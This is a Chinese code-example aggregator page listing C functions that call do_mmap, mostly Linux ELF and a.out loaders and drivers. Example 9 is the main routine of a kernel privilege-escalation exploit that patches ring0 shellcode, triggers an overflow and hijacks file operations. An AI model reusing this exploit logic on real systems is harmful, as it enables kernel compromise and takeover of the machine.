本文整理汇总了C++中do_mmap函数的典型用法代码示例。如果您正苦于以下问题:C++ do_mmap函数的具体用法?C++ do_mmap怎么用?C++ do_mmap使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了do_mmap函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的C++代码示例。
示例1: init_c2d_buffer
/*===========================================================================
* FUNCTION - init_c2d_buffer -
*
* DESCRIPTION: allocate and register C2D buffer with kernel.
*==========================================================================*/
static int init_c2d_buffer(config_ctrl_t *ctrl, struct msm_pmem_info *info,
stereo_frame_t* pStereoFrame, int bufPath)
{
static int prevBufPath = -1;
uint32_t frame_w = 0, frame_h = 0;
uint32_t stride = 0;
uint8_t pad_2K_bool = (ctrl->vfeCtrl.vfeMode == VFE_MODE_SNAPSHOT) ?
FALSE : TRUE;
if (prevBufPath == bufPath) {
CDBG("%s: No need to create new C2D buffer\n", __func__);
return TRUE;
} else if (prevBufPath != -1) {
CDBG("%s: Create new C2D buffer for bufPath = %d\n", __func__, bufPath);
if (!release_c2d_buffer(ctrl, info))
CDBG_HIGH("%s: release_c2d_buffer failed\n", __func__);
}
if (pStereoFrame->non_zoom_upscale) {
frame_w = pStereoFrame->right_pack_dim.orig_w;
frame_h = pStereoFrame->right_pack_dim.orig_h;
} else {
frame_w = pStereoFrame->right_pack_dim.modified_w;
frame_h = pStereoFrame->right_pack_dim.modified_h;
}
info->vaddr = (void *)do_mmap(PAD_2_2K(frame_w * frame_h, pad_2K_bool) * 3/2,
&(info->fd));
if (!info->vaddr) {
CDBG_ERROR("%s: mmap failed\n", __func__);
return FALSE;
}
info->type = MSM_PMEM_C2D;
info->y_off = 0;
info->offset = 0;
info->active = 0;
info->cbcr_off = PAD_2_2K(frame_w * frame_h, pad_2K_bool);
info->len = PAD_2_2K(frame_w * frame_h, pad_2K_bool);
if (ioctl(ctrl->camfd, MSM_CAM_IOCTL_REGISTER_PMEM, info) < 0) {
CDBG_ERROR("%s: ioctl MSM_CAM_IOCTL_REGISTER_PMEM is failed..\n", __func__);
return FALSE;
}
if (!init_kgsl()) {
CDBG_ERROR("%s: init_kgsl failed\n", __func__);
return FALSE;
}
stride = frame_w;
c2d_obj.dst_addr.vAddr0 = (uint32_t)info->vaddr;
c2d_obj.dst_addr.gAddr0 = get_gpu_addr(info->fd,
PAD_2_2K(frame_w * frame_h, pad_2K_bool) * 3/2, info->offset,
(uint32_t)info->vaddr);
c2d_obj.dst_addr.vAddr1 = c2d_obj.dst_addr.vAddr0 +
PAD_2_2K(frame_w * frame_h, pad_2K_bool);
c2d_obj.dst_addr.gAddr1 = c2d_obj.dst_addr.gAddr0 +
PAD_2_2K(frame_w * frame_h, pad_2K_bool);
cam_list_init(&(g_list.list));
add_gpu_addr_item(info->fd, c2d_obj.dst_addr.vAddr0, c2d_obj.dst_addr.gAddr0,
c2d_obj.dst_addr.gAddr0);
create_default_C2D_surface(&(c2d_obj.srcSurfaceDef), &(c2d_obj.src_id),
C2D_SOURCE);
create_default_C2D_surface(&(c2d_obj.dstSurfaceDef), &(c2d_obj.dst_id),
C2D_TARGET);
/* C2D destination surface values will not change. */
update_C2D_surface(&(c2d_obj.dstSurfaceDef), frame_w, frame_h, c2d_obj.dst_id,
&(c2d_obj.dst_addr), stride, C2D_TARGET, c2d_format);
prevBufPath = bufPath;
return TRUE;
} /* init_c2d_buffer */示例2: load_aout32_binary
static int load_aout32_binary(struct linux_binprm * bprm, struct pt_regs * regs)
{
struct exec ex;
unsigned long error;
unsigned long fd_offset;
unsigned long rlim;
unsigned long orig_thr_flags;
int retval;
ex = *((struct exec *) bprm->buf); /* exec-header */
if ((N_MAGIC(ex) != ZMAGIC && N_MAGIC(ex) != OMAGIC &&
N_MAGIC(ex) != QMAGIC && N_MAGIC(ex) != NMAGIC) ||
N_TRSIZE(ex) || N_DRSIZE(ex) ||
bprm->file->f_path.dentry->d_inode->i_size < ex.a_text+ex.a_data+N_SYMSIZE(ex)+N_TXTOFF(ex)) {
return -ENOEXEC;
}
fd_offset = N_TXTOFF(ex);
/* Check initial limits. This avoids letting people circumvent
* size limits imposed on them by creating programs with large
* arrays in the data or bss.
*/
rlim = current->signal->rlim[RLIMIT_DATA].rlim_cur;
if (rlim >= RLIM_INFINITY)
rlim = ~0;
if (ex.a_data + ex.a_bss > rlim)
return -ENOMEM;
/* Flush all traces of the currently running executable */
retval = flush_old_exec(bprm);
if (retval)
return retval;
/* OK, This is the point of no return */
set_personality(PER_SUNOS);
current->mm->end_code = ex.a_text +
(current->mm->start_code = N_TXTADDR(ex));
current->mm->end_data = ex.a_data +
(current->mm->start_data = N_DATADDR(ex));
current->mm->brk = ex.a_bss +
(current->mm->start_brk = N_BSSADDR(ex));
current->mm->free_area_cache = current->mm->mmap_base;
current->mm->cached_hole_size = 0;
current->mm->mmap = NULL;
compute_creds(bprm);
current->flags &= ~PF_FORKNOEXEC;
if (N_MAGIC(ex) == NMAGIC) {
loff_t pos = fd_offset;
/* Fuck me plenty... */
down_write(¤t->mm->mmap_sem);
error = do_brk(N_TXTADDR(ex), ex.a_text);
up_write(¤t->mm->mmap_sem);
bprm->file->f_op->read(bprm->file, (char __user *)N_TXTADDR(ex),
ex.a_text, &pos);
down_write(¤t->mm->mmap_sem);
error = do_brk(N_DATADDR(ex), ex.a_data);
up_write(¤t->mm->mmap_sem);
bprm->file->f_op->read(bprm->file, (char __user *)N_DATADDR(ex),
ex.a_data, &pos);
goto beyond_if;
}
if (N_MAGIC(ex) == OMAGIC) {
loff_t pos = fd_offset;
down_write(¤t->mm->mmap_sem);
do_brk(N_TXTADDR(ex) & PAGE_MASK,
ex.a_text+ex.a_data + PAGE_SIZE - 1);
up_write(¤t->mm->mmap_sem);
bprm->file->f_op->read(bprm->file, (char __user *)N_TXTADDR(ex),
ex.a_text+ex.a_data, &pos);
} else {
static unsigned long error_time;
if ((ex.a_text & 0xfff || ex.a_data & 0xfff) &&
(N_MAGIC(ex) != NMAGIC) && (jiffies-error_time) > 5*HZ)
{
printk(KERN_NOTICE "executable not page aligned\n");
error_time = jiffies;
}
if (!bprm->file->f_op->mmap) {
loff_t pos = fd_offset;
down_write(¤t->mm->mmap_sem);
do_brk(0, ex.a_text+ex.a_data);
up_write(¤t->mm->mmap_sem);
bprm->file->f_op->read(bprm->file,
(char __user *)N_TXTADDR(ex),
ex.a_text+ex.a_data, &pos);
goto beyond_if;
}
down_write(¤t->mm->mmap_sem);
error = do_mmap(bprm->file, N_TXTADDR(ex), ex.a_text,
PROT_READ | PROT_EXEC,
MAP_FIXED | MAP_PRIVATE | MAP_DENYWRITE | MAP_EXECUTABLE,
fd_offset);
up_write(¤t->mm->mmap_sem);
//.........这里部分代码省略.........
示例3: load_irix_interp
/* This is much more generalized than the library routine read function,
* so we keep this separate. Technically the library read function
* is only provided so that we can read a.out libraries that have
* an ELF header.
*/
static unsigned int load_irix_interp(struct elfhdr * interp_elf_ex,
struct file * interpreter,
unsigned int *interp_load_addr)
{
struct elf_phdr *elf_phdata = NULL;
struct elf_phdr *eppnt;
unsigned int len;
unsigned int load_addr;
int elf_bss;
int retval;
unsigned int last_bss;
int error;
int i;
unsigned int k;
elf_bss = 0;
last_bss = 0;
error = load_addr = 0;
print_elfhdr(interp_elf_ex);
/* First of all, some simple consistency checks */
if ((interp_elf_ex->e_type != ET_EXEC &&
interp_elf_ex->e_type != ET_DYN) ||
!interpreter->f_op->mmap) {
printk("IRIX interp has bad e_type %d\n", interp_elf_ex->e_type);
return 0xffffffff;
}
/* Now read in all of the header information */
if (sizeof(struct elf_phdr) * interp_elf_ex->e_phnum > PAGE_SIZE) {
printk("IRIX interp header bigger than a page (%d)\n",
(sizeof(struct elf_phdr) * interp_elf_ex->e_phnum));
return 0xffffffff;
}
elf_phdata = kmalloc(sizeof(struct elf_phdr) * interp_elf_ex->e_phnum,
GFP_KERNEL);
if (!elf_phdata) {
printk("Cannot kmalloc phdata for IRIX interp.\n");
return 0xffffffff;
}
/* If the size of this structure has changed, then punt, since
* we will be doing the wrong thing.
*/
if (interp_elf_ex->e_phentsize != 32) {
printk("IRIX interp e_phentsize == %d != 32 ",
interp_elf_ex->e_phentsize);
kfree(elf_phdata);
return 0xffffffff;
}
retval = kernel_read(interpreter, interp_elf_ex->e_phoff,
(char *) elf_phdata,
sizeof(struct elf_phdr) * interp_elf_ex->e_phnum);
dump_phdrs(elf_phdata, interp_elf_ex->e_phnum);
eppnt = elf_phdata;
for (i = 0; i < interp_elf_ex->e_phnum; i++, eppnt++) {
if (eppnt->p_type == PT_LOAD) {
int elf_type = MAP_PRIVATE | MAP_DENYWRITE;
int elf_prot = 0;
unsigned long vaddr = 0;
if (eppnt->p_flags & PF_R)
elf_prot = PROT_READ;
if (eppnt->p_flags & PF_W)
elf_prot |= PROT_WRITE;
if (eppnt->p_flags & PF_X)
elf_prot |= PROT_EXEC;
elf_type |= MAP_FIXED;
vaddr = eppnt->p_vaddr;
pr_debug("INTERP do_mmap"
"(%p, %08lx, %08lx, %08lx, %08lx, %08lx) ",
interpreter, vaddr,
(unsigned long)
(eppnt->p_filesz + (eppnt->p_vaddr & 0xfff)),
(unsigned long)
elf_prot, (unsigned long) elf_type,
(unsigned long)
(eppnt->p_offset & 0xfffff000));
down_write(¤t->mm->mmap_sem);
error = do_mmap(interpreter, vaddr,
eppnt->p_filesz + (eppnt->p_vaddr & 0xfff),
elf_prot, elf_type,
eppnt->p_offset & 0xfffff000);
up_write(¤t->mm->mmap_sem);
if (error < 0 && error > -1024) {
printk("Aieee IRIX interp mmap error=%d\n",
error);
//.........这里部分代码省略.........
示例4: load_irix_library
/* This is really simpleminded and specialized - we are loading an
* a.out library that is given an ELF header.
*/
static int load_irix_library(struct file *file)
{
struct elfhdr elf_ex;
struct elf_phdr *elf_phdata = NULL;
unsigned int len = 0;
int elf_bss = 0;
int retval;
unsigned int bss;
int error;
int i, j, k;
error = kernel_read(file, 0, (char *) &elf_ex, sizeof(elf_ex));
if (error != sizeof(elf_ex))
return -ENOEXEC;
if (memcmp(elf_ex.e_ident, ELFMAG, SELFMAG) != 0)
return -ENOEXEC;
/* First of all, some simple consistency checks. */
if (elf_ex.e_type != ET_EXEC || elf_ex.e_phnum > 2 ||
!file->f_op->mmap)
return -ENOEXEC;
/* Now read in all of the header information. */
if (sizeof(struct elf_phdr) * elf_ex.e_phnum > PAGE_SIZE)
return -ENOEXEC;
elf_phdata = kmalloc(sizeof(struct elf_phdr) * elf_ex.e_phnum, GFP_KERNEL);
if (elf_phdata == NULL)
return -ENOMEM;
retval = kernel_read(file, elf_ex.e_phoff, (char *) elf_phdata,
sizeof(struct elf_phdr) * elf_ex.e_phnum);
j = 0;
for (i=0; i<elf_ex.e_phnum; i++)
if ((elf_phdata + i)->p_type == PT_LOAD) j++;
if (j != 1) {
kfree(elf_phdata);
return -ENOEXEC;
}
while (elf_phdata->p_type != PT_LOAD) elf_phdata++;
/* Now use mmap to map the library into memory. */
down_write(¤t->mm->mmap_sem);
error = do_mmap(file,
elf_phdata->p_vaddr & 0xfffff000,
elf_phdata->p_filesz + (elf_phdata->p_vaddr & 0xfff),
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_PRIVATE | MAP_DENYWRITE,
elf_phdata->p_offset & 0xfffff000);
up_write(¤t->mm->mmap_sem);
k = elf_phdata->p_vaddr + elf_phdata->p_filesz;
if (k > elf_bss) elf_bss = k;
if (error != (elf_phdata->p_vaddr & 0xfffff000)) {
kfree(elf_phdata);
return error;
}
padzero(elf_bss);
len = (elf_phdata->p_filesz + elf_phdata->p_vaddr+ 0xfff) & 0xfffff000;
bss = elf_phdata->p_memsz + elf_phdata->p_vaddr;
if (bss > len) {
down_write(¤t->mm->mmap_sem);
do_brk(len, bss-len);
up_write(¤t->mm->mmap_sem);
}
kfree(elf_phdata);
return 0;
}示例5: load_elf_library
static int load_elf_library(int fd)
{
/* uselib syscall isn't implemented so we don't need this function
just yet... */
return -EINVAL;
#if 0
struct file * file;
struct dentry * dentry;
struct inode * inode;
struct elf_phdr *elf_phdata;
unsigned long elf_bss = 0, bss, len, k;
int retval, error, i, j;
struct elfhdr elf_ex;
loff_t offset = 0;
error = -EACCES;
file = fget(fd);
if (!file || !file->f_op)
goto out;
dentry = file->f_dentry;
inode = dentry->d_inode;
/* seek to the beginning of the file */
error = -ENOEXEC;
/* N.B. save current DS?? */
set_fs(KERNEL_DS);
retval = file->f_op->read(file, (char *) &elf_ex, sizeof(elf_ex), &offset);
set_fs(USER_DS);
if (retval != sizeof(elf_ex))
goto out_putf;
if (elf_ex.e_ident[0] != 0x7f ||
strncmp(&elf_ex.e_ident[1], "ELF", 3) != 0)
goto out_putf;
/* First of all, some simple consistency checks */
if (elf_ex.e_type != ET_EXEC || elf_ex.e_phnum > 2 ||
!elf_check_arch(elf_ex.e_machine) ||
(!inode->i_op || !inode->i_op->default_file_ops->mmap))
goto out_putf;
/* Now read in all of the header information */
j = sizeof(struct elf_phdr) * elf_ex.e_phnum;
if (j > ELF_EXEC_PAGESIZE)
goto out_putf;
error = -ENOMEM;
elf_phdata = (struct elf_phdr *) kmalloc(j, GFP_KERNEL);
if (!elf_phdata)
goto out_putf;
/* N.B. check for error return?? */
retval = read_exec(dentry, elf_ex.e_phoff, (char *) elf_phdata,
sizeof(struct elf_phdr) * elf_ex.e_phnum, 1);
error = -ENOEXEC;
for (j = 0, i = 0; i<elf_ex.e_phnum; i++)
if ((elf_phdata + i)->p_type == PT_LOAD) j++;
if (j != 1)
goto out_free_ph;
while (elf_phdata->p_type != PT_LOAD) elf_phdata++;
/* Now use mmap to map the library into memory. */
error = do_mmap(file,
ELF_PAGESTART(elf_phdata->p_vaddr),
(elf_phdata->p_filesz +
ELF_PAGEOFFSET(elf_phdata->p_vaddr)),
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_FIXED | MAP_PRIVATE | MAP_DENYWRITE,
(elf_phdata->p_offset -
ELF_PAGEOFFSET(elf_phdata->p_vaddr)));
if (error != ELF_PAGESTART(elf_phdata->p_vaddr))
goto out_free_ph;
k = elf_phdata->p_vaddr + elf_phdata->p_filesz;
if (k > elf_bss)
elf_bss = k;
padzero(elf_bss);
len = ELF_PAGESTART(elf_phdata->p_filesz + elf_phdata->p_vaddr +
ELF_EXEC_PAGESIZE - 1);
bss = elf_phdata->p_memsz + elf_phdata->p_vaddr;
if (bss > len)
do_mmap(NULL, len, bss - len,
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_FIXED|MAP_PRIVATE, 0);
error = 0;
out_free_ph:
kfree(elf_phdata);
out_putf:
fput(file);
out:
return error;
#endif
}示例6: load_elf_interp
static unsigned long load_elf_interp(struct elfhdr * interp_elf_ex,
int interpreter_fd,
unsigned long *interp_load_addr)
{
struct elf_phdr *elf_phdata;
struct elf_phdr *eppnt;
unsigned long load_addr = 0;
int load_addr_set = 0;
unsigned long last_bss = 0, elf_bss = 0;
unsigned long error = ~0UL;
int elf_exec_fileno;
int retval, i, size;
/* First of all, some simple consistency checks */
if (interp_elf_ex->e_type != ET_EXEC &&
interp_elf_ex->e_type != ET_DYN)
goto out;
if (!elf_check_arch(interp_elf_ex->e_machine))
goto out;
/*
* If the size of this structure has changed, then punt, since
* we will be doing the wrong thing.
*/
if (interp_elf_ex->e_phentsize != sizeof(struct elf_phdr))
goto out;
/* Now read in all of the header information */
if (interp_elf_ex->e_phnum < 1 || interp_elf_ex->e_phnum >
ELF_EXEC_PAGESIZE / sizeof(struct elf_phdr))
goto out;
size = sizeof(struct elf_phdr) * interp_elf_ex->e_phnum;
elf_phdata = (struct elf_phdr *) malloc(size);
if (!elf_phdata)
goto out;
retval = read_exec(interpreter_fd, interp_elf_ex->e_phoff,
(char *) elf_phdata, size, 1);
error = retval;
if (retval < 0)
goto out_free;
error = ~0UL;
elf_exec_fileno = dup(interpreter_fd);
if (elf_exec_fileno < 0)
goto out_free;
eppnt = elf_phdata;
for (i=0; i<interp_elf_ex->e_phnum; i++, eppnt++) {
if (eppnt->p_type == PT_LOAD) {
int elf_type = MAP_PRIVATE; // | MAP_DENYWRITE;
int elf_prot = 0;
unsigned long vaddr = 0;
unsigned long k, map_addr;
if (eppnt->p_flags & PF_R) elf_prot = PROT_READ;
if (eppnt->p_flags & PF_W) elf_prot |= PROT_WRITE;
if (eppnt->p_flags & PF_X) elf_prot |= PROT_EXEC;
vaddr = eppnt->p_vaddr;
if (interp_elf_ex->e_type == ET_EXEC || load_addr_set) {
elf_type |= MAP_FIXED;
}
#ifdef __VERBOSE__
printf("mapping: %08lX (load_addr: %08lX, vaddr:%08lX)\n",
load_addr + ELF_PAGESTART(vaddr), load_addr, vaddr);
#endif
map_addr = do_mmap(elf_exec_fileno, load_addr + ELF_PAGESTART(vaddr),
eppnt->p_filesz + ELF_PAGEOFFSET(eppnt->p_vaddr),
elf_prot, elf_type,
eppnt->p_offset - ELF_PAGEOFFSET(eppnt->p_vaddr));
#ifdef __VERBOSE__
printf("map_addr: %08lX\n", map_addr);
#endif
if (map_addr > -1024UL) /* Real error */
goto out_close;
if (!load_addr_set && interp_elf_ex->e_type == ET_DYN) {
load_addr = map_addr - ELF_PAGESTART(vaddr);
load_addr_set = 1;
}
/*
* Find the end of the file mapping for this phdr, and keep
* track of the largest address we see for this.
*/
k = load_addr + eppnt->p_vaddr + eppnt->p_filesz;
if (k > elf_bss)
elf_bss = k;
/*
* Do the same thing for the memory mapping - between
* elf_bss and last_bss is the bss section.
//.........这里部分代码省略.........
示例7: load_elf_binary
//.........这里部分代码省略.........
is because the brk will follow the loader, and is not movable. */
load_bias = ELF_PAGESTART(elf_ex.e_type==ET_DYN ? ELF_ET_DYN_BASE : 0);
#ifdef __VERBOSE__
printf("load_bias: %08lX\n", load_bias);
#endif
/* Now we do a little grungy work by mmaping the ELF image into
the correct location in memory. At this point, we assume that
the image should be loaded at fixed address, not at a variable
address. */
for(i = 0, elf_ppnt = elf_phdata; i < elf_ex.e_phnum; i++, elf_ppnt++) {
int elf_prot = 0, elf_flags;
unsigned long vaddr;
if (elf_ppnt->p_type != PT_LOAD)
continue;
if (elf_ppnt->p_flags & PF_R) elf_prot |= PROT_READ;
if (elf_ppnt->p_flags & PF_W) elf_prot |= PROT_WRITE;
if (elf_ppnt->p_flags & PF_X) elf_prot |= PROT_EXEC;
elf_flags = MAP_PRIVATE; // |MAP_DENYWRITE|MAP_EXECUTABLE;
vaddr = elf_ppnt->p_vaddr;
if (elf_ex.e_type == ET_EXEC || load_addr_set) {
elf_flags |= MAP_FIXED;
}
//my_print("[ender]9\n");
#ifdef __VERBOSE__
printf("mapping: %08lX\n", ELF_PAGESTART(load_bias + vaddr));
#endif
error = do_mmap(bprm->fd, ELF_PAGESTART(load_bias + vaddr),
(elf_ppnt->p_filesz + ELF_PAGEOFFSET(elf_ppnt->p_vaddr)),
elf_prot, elf_flags,
(elf_ppnt->p_offset - ELF_PAGEOFFSET(elf_ppnt->p_vaddr)));
#ifdef __VERBOSE__
printf("error: %08lX\n", error);
#endif
if (!load_addr_set) {
load_addr_set = 1;
load_addr = (elf_ppnt->p_vaddr - elf_ppnt->p_offset);
#ifdef __VERBOSE__
printf("load_addr: %08lX, vaddr: %08lX\n", load_addr, vaddr);
#endif
if (elf_ex.e_type == ET_DYN) {
load_bias += error - ELF_PAGESTART(load_bias + vaddr);
load_addr += error;
#ifdef __VERBOSE__
printf("new\nload_bias: %08lX, load_addr: %08lX\n", load_bias, load_addr);
#endif
}
}
k = elf_ppnt->p_vaddr;
if (k < start_code) start_code = k;
k = elf_ppnt->p_vaddr + elf_ppnt->p_filesz;
if (k > elf_bss)
elf_bss = k;
if ((elf_ppnt->p_flags & PF_X) && end_code < k)
end_code = k;
if (end_data < k)
end_data = k;示例8: load_exeso_binary
static int load_exeso_binary(struct linux_binprm *bprm, struct pt_regs *regs)
{
struct elfhdr *elf_ex;
struct elf_phdr *elf_phdata = NULL;
struct mm_struct *mm;
unsigned long load_addr = 0;
unsigned long error;
int retval = 0;
unsigned long pe_entry, ntdll_load_addr = 0;
unsigned long start_code, end_code, start_data, end_data;
unsigned long ntdll_entry;
int executable_stack = EXSTACK_DEFAULT;
unsigned long def_flags = 0;
unsigned long stack_top;
#ifdef NTDLL_SO
unsigned long interp_load_addr;
unsigned long interp_entry;
#endif
struct eprocess *process;
struct ethread *thread;
PRTL_USER_PROCESS_PARAMETERS ppb;
OBJECT_ATTRIBUTES ObjectAttributes;
INITIAL_TEB init_teb;
BOOLEAN is_win32=FALSE;
struct startup_info *info=NULL;
struct eprocess *parent_eprocess=NULL;
struct ethread *parent_ethread=NULL;
struct w32process* child_w32process =NULL;
struct w32process* parent_w32process =NULL;
elf_ex = (struct elfhdr *)bprm->buf;
retval = -ENOEXEC;
/* First of all, some simple consistency checks */
if (memcmp(elf_ex->e_ident, ELFMAG, SELFMAG) != 0)
goto out;
if (elf_ex->e_type != ET_EXEC && elf_ex->e_type != ET_DYN)
goto out;
if (!elf_check_arch(elf_ex))
goto out;
if (!bprm->file->f_op||!bprm->file->f_op->mmap)
goto out;
if (elf_ex->e_phentsize != sizeof(struct elf_phdr))
goto out;
if (elf_ex->e_phnum < 1 ||
elf_ex->e_phnum > 65536U / sizeof(struct elf_phdr))
goto out;
if(!check_exeso(bprm))
goto out;
start_code = ~0UL;
end_code = 0;
start_data = 0;
end_data = 0;
if(current->parent->ethread)
{
is_win32 = TRUE;
parent_ethread = current->parent->ethread;
parent_eprocess = parent_ethread->threads_process;
}
/* Flush all traces of the currently running executable */
retval = flush_old_exec(bprm);
if (retval) {
goto out;
}
/* OK, This is the point of no return */
mm = current->mm;
current->flags &= ~PF_FORKNOEXEC;
mm->def_flags = def_flags;
current->signal->rlim[RLIMIT_STACK].rlim_cur = WIN32_STACK_LIMIT;
current->signal->rlim[RLIMIT_STACK].rlim_max = WIN32_STACK_LIMIT;
current->personality |= ADDR_COMPAT_LAYOUT;
arch_pick_mmap_layout(mm);
/* Do this so that we can load the ntdll, if need be. We will
change some of these later */
mm->free_area_cache = mm->mmap_base = WIN32_UNMAPPED_BASE;
mm->cached_hole_size = 0;
stack_top = WIN32_STACK_LIMIT + WIN32_LOWEST_ADDR;
retval = setup_arg_pages(bprm, stack_top, executable_stack);
if (retval < 0)
goto out_free_file;
down_write(&mm->mmap_sem);
/* reserve first 0x100000 */
do_mmap_pgoff(NULL, 0, WIN32_LOWEST_ADDR, PROT_NONE, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, 0);
/* reserve first 0x7fff0000 - 0x80000000 */
do_mmap_pgoff(NULL, WIN32_TASK_SIZE - 0x10000, 0x10000,
PROT_NONE, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, 0);
/* reserve first 0x81000000 - 0xc0000000
* 0x80000000 - 0x81000000 used for wine SYSTEM_HEAP */
do_mmap_pgoff(NULL, WIN32_TASK_SIZE + WIN32_SYSTEM_HEAP_SIZE,
TASK_SIZE - WIN32_TASK_SIZE - WIN32_SYSTEM_HEAP_SIZE,
PROT_NONE, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, 0);
//.........这里部分代码省略.........
示例9: main
int main(int argc, char *argv[])
{
int peerx, peery,i;
__u64 *patch;
srvport = get_port();
uid=getuid();
gid=getgid();
fops=get_fops_addr() + 64;
if(!fops)
{
__msg("[!!] Unable to locate symbols...\n");
return 1;
}
__msg_f("[**] Patching ring0 shellcode with userspace addr: %p\n", ring0c);
patch = (__u64*)(ring0 + CJUMP_OFF);
*patch = (__u64)ring0c;
__msg_f("[**] Using port: %d\n", srvport);
__msg("[**] Getting slab info...\n");
kmalloc_fd = get_kmalloc_fd();
if(!get_total_object(kmalloc_fd))
__fatal("[!!] Only SLUB allocator supported\n");
__msg("[**] Mapping Segments...\n");
__msg("[**] Trying mapping safe page...");
if(do_mmap(STRUCT_PAGE, 1) < 0)
{
__msg("Page Protection Present (Unable to Map Safe Page)\n");
__msg("[**] Mapping High Address Page (dont kill placeholder child)\n");
if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)
__fatal_errno("mmap");
cankill=0; /* dont kill child owning unsafe fds.. */
highpage=1; /* ssnmap in higher pages */
zstream=STREAM_ZERO_ALT;
}
else
__msg("Done\n");
__msg("[**] Mapping Code Page... ");
if(do_mmap(CODE_PAGE, 1) < 0)
__fatal_errno("mmap");
else
__msg("Done\n");
memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));
__msg("[**] Binding on CPU 0\n");
bindcpu();
__msg("[**] Start Server Thread..\n");
child = start_listener();
sleep(3);
do_socks(&server_s, zstream);
for(i=0; i<7; i++)
{
close(g_array[8-1-i]);
}
clr(1);
alloc_tioclinux(); // trigger overflow
peerx = create_and_init();
connect_peer(peerx, &server_s);
peery = create_and_init();
connect_peer(peery, &server_s);
sleep(1);
unsafe_fd[0] = peerx;
unsafe_fd[1] = g_array[8];
unsafe_fd[2] = peery;
unsafe_fd[3] = g_array[9];
__msg("\n");
__msg_f("[**] Umapped end-to-end fd: %d\n", fd_zmap_srv);
__msg_f("[**] Unsafe fd: ( ");
for(i=0; i<4; i++)
__msg_f("%d ", unsafe_fd[i]);
__msg(")\n");
__msg("[**] Hijacking fops...\n");
overwrite_fops(fd_zmap_srv, &caddr, peery);
/* if u get here.. something nasty happens...may crash..*/
__free_stuff();
__msg("[**] Exploit failed.. freezing process\n");
kill(getpid(), SIGSTOP);
return 0;
}示例10: sys_mmap
uintptr_t sys_mmap(uintptr_t addr, size_t length, int prot, int flags, int fd, off_t offset)
{
uintptr_t ret = do_mmap(addr, length, prot, flags, fd, offset);
return ret;
}示例11: s3c_mem_ioctl
int s3c_mem_ioctl(struct inode *inode, struct file *file, unsigned int cmd, unsigned long arg)
{
unsigned long *virt_addr;
struct mm_struct *mm = current->mm;
struct s3c_mem_alloc param;
struct s3c_mem_dma_param dma_param;
switch (cmd) {
case S3C_MEM_ALLOC:
mutex_lock(&mem_alloc_lock);
if(copy_from_user(¶m, (struct s3c_mem_alloc *)arg, sizeof(struct s3c_mem_alloc))){
mutex_unlock(&mem_alloc_lock);
return -EFAULT;
}
flag = MEM_ALLOC;
param.vir_addr = do_mmap(file, 0, param.size, PROT_READ|PROT_WRITE, MAP_SHARED, 0);
DEBUG("param.vir_addr = %08x, %d\n", param.vir_addr, __LINE__);
if(param.vir_addr == -EINVAL) {
printk("S3C_MEM_ALLOC FAILED\n");
flag = 0;
mutex_unlock(&mem_alloc_lock);
return -EFAULT;
}
param.phy_addr = physical_address;
DEBUG("KERNEL MALLOC : param.phy_addr = 0x%X \t size = %d \t param.vir_addr = 0x%X, %d\n", param.phy_addr, param.size, param.vir_addr, __LINE__);
if(copy_to_user((struct s3c_mem_alloc *)arg, ¶m, sizeof(struct s3c_mem_alloc))){
flag = 0;
mutex_unlock(&mem_alloc_lock);
return -EFAULT;
}
flag = 0;
mutex_unlock(&mem_alloc_lock);
break;
case S3C_MEM_CACHEABLE_ALLOC:
mutex_lock(&mem_cacheable_alloc_lock);
if(copy_from_user(¶m, (struct s3c_mem_alloc *)arg, sizeof(struct s3c_mem_alloc))){
mutex_unlock(&mem_cacheable_alloc_lock);
return -EFAULT;
}
flag = MEM_ALLOC_CACHEABLE;
param.vir_addr = do_mmap(file, 0, param.size, PROT_READ|PROT_WRITE, MAP_SHARED, 0);
DEBUG("param.vir_addr = %08x, %d\n", param.vir_addr, __LINE__);
if(param.vir_addr == -EINVAL) {
printk("S3C_MEM_ALLOC FAILED\n");
flag = 0;
mutex_unlock(&mem_cacheable_alloc_lock);
return -EFAULT;
}
param.phy_addr = physical_address;
DEBUG("KERNEL MALLOC : param.phy_addr = 0x%X \t size = %d \t param.vir_addr = 0x%X, %d\n", param.phy_addr, param.size, param.vir_addr, __LINE__);
if(copy_to_user((struct s3c_mem_alloc *)arg, ¶m, sizeof(struct s3c_mem_alloc))){
flag = 0;
mutex_unlock(&mem_cacheable_alloc_lock);
return -EFAULT;
}
flag = 0;
mutex_unlock(&mem_cacheable_alloc_lock);
break;
case S3C_MEM_SHARE_ALLOC:
mutex_lock(&mem_share_alloc_lock);
if(copy_from_user(¶m, (struct s3c_mem_alloc *)arg, sizeof(struct s3c_mem_alloc))){
mutex_unlock(&mem_share_alloc_lock);
return -EFAULT;
}
flag = MEM_ALLOC_SHARE;
physical_address = param.phy_addr;
DEBUG("param.phy_addr = %08x, %d\n", physical_address, __LINE__);
param.vir_addr = do_mmap(file, 0, param.size, PROT_READ|PROT_WRITE, MAP_SHARED, 0);
DEBUG("param.vir_addr = %08x, %d\n", param.vir_addr, __LINE__);
if(param.vir_addr == -EINVAL) {
printk("S3C_MEM_SHARE_ALLOC FAILED\n");
flag = 0;
mutex_unlock(&mem_share_alloc_lock);
return -EFAULT;
}
DEBUG("MALLOC_SHARE : param.phy_addr = 0x%X \t size = %d \t param.vir_addr = 0x%X, %d\n", param.phy_addr, param.size, param.vir_addr, __LINE__);
if(copy_to_user((struct s3c_mem_alloc *)arg, ¶m, sizeof(struct s3c_mem_alloc))){
flag = 0;
mutex_unlock(&mem_share_alloc_lock);
return -EFAULT;
}
flag = 0;
mutex_unlock(&mem_share_alloc_lock);
break;
case S3C_MEM_CACHEABLE_SHARE_ALLOC:
mutex_lock(&mem_cacheable_share_alloc_lock);
if(copy_from_user(¶m, (struct s3c_mem_alloc *)arg, sizeof(struct s3c_mem_alloc))){
mutex_unlock(&mem_cacheable_share_alloc_lock);
return -EFAULT;
}
flag = MEM_ALLOC_CACHEABLE_SHARE;
//.........这里部分代码省略.........
示例12: CVE_2010_0307_linux2_6_27_31_load_elf_binary
